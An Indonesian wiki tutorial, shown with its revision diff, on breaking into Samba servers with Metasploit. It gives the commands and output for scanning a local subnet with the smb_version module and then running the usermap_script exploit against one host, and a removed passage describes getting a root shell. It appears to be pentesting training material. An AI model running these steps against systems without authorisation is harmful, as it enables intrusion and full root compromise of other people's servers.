Difference between revisions of "Kali Linux: Membobol Network Neighbourhood / SAMBA"

From OnnoWiki
Jump to navigation Jump to search
Line 4: Line 4:
  
  
==Lakukan Enumerasi==
+
==Jalankan msfconsole==
  
 
Ketik di console
 
Ketik di console
Line 37: Line 37:
 
  + -- --=[ 432 payloads - 37 encoders - 8 nops            ]
 
  + -- --=[ 432 payloads - 37 encoders - 8 nops            ]
 
  + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]  
 
  + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]  
 
 
  
  
Line 67: Line 65:
 
  + -- --=[ 432 payloads - 37 encoders - 8 nops            ]
 
  + -- --=[ 432 payloads - 37 encoders - 8 nops            ]
 
  + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
 
  + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
 +
 +
==Lakukan enumerasi==
  
  
Line 106: Line 106:
 
  [*] Scanned 256 of 256 hosts (100% complete)
 
  [*] Scanned 256 of 256 hosts (100% complete)
 
  [*] Auxiliary module execution completed
 
  [*] Auxiliary module execution completed
 +
 +
==exploit==
  
  
Line 136: Line 138:
  
  
 +
Jika sudah selesai
  
And like magic we have a command shell! Meaning we are in the SAMBA server itself, if we type “ls” without quotes this will list the directory, with this exploit we are in the root folder. Now just to be 100% sure we owned this box, I want you to type “whoami” without quotes and you can see below for yourself the server responded with “root” Good Game Samba Box!
+
quit
 
 
whoami
 
 
 
This concludes the owning Samba Servers blog, I will have more introduction blogs coming soon on the Metasploit framework so stay tuned!
 
  
 
==Referensi==
 
==Referensi==
  
 
* http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/
 
* http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/

Revision as of 07:38, 11 February 2016

Sumber: http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/



Jalankan msfconsole

Ketik di console

msfconsole

Akan keluar kira-kira

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit 

       =[ metasploit v4.11.4-2015071403                   ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 


yang lebih sopan, KETIK

msfconsole thankyou

Akan keluar


     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     ||| 


Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit 

       =[ metasploit v4.11.4-2015071403                   ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

Lakukan enumerasi

KETIK

use auxiliary/scanner/smb/smb_version
show options

Keluar

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

KETIK

set RHOSTS 192.168.0.0/24
set THREADS 75
run

Hasilnya

[*] 192.168.0.7:445 could not be identified: Unix (Samba 3.6.3-31a.osstech)
[*] Scanned  44 of 256 hosts (17% complete)
[*] Scanned  68 of 256 hosts (26% complete)
[*] Scanned  78 of 256 hosts (30% complete)
[*] 192.168.0.90:445 is running Windows 7 Professional SP1 (build:7601) (name:HP-PC) (domain:WORKGROUP)
[*] Scanned 152 of 256 hosts (59% complete)
[*] Scanned 153 of 256 hosts (59% complete)
[*] 192.168.0.221:445 could not be identified: Unix (Samba 3.0.37)
[*] Scanned 156 of 256 hosts (60% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 227 of 256 hosts (88% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

exploit

KETIK

use exploit/multi/samba/usermap_script
show options

Keluar

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port
 

Exploit target:

   Id  Name
   --  ----
   0   Automatic


KETIK

set RHOST 192.168.0.7
exploit


Jika sudah selesai

quit

Referensi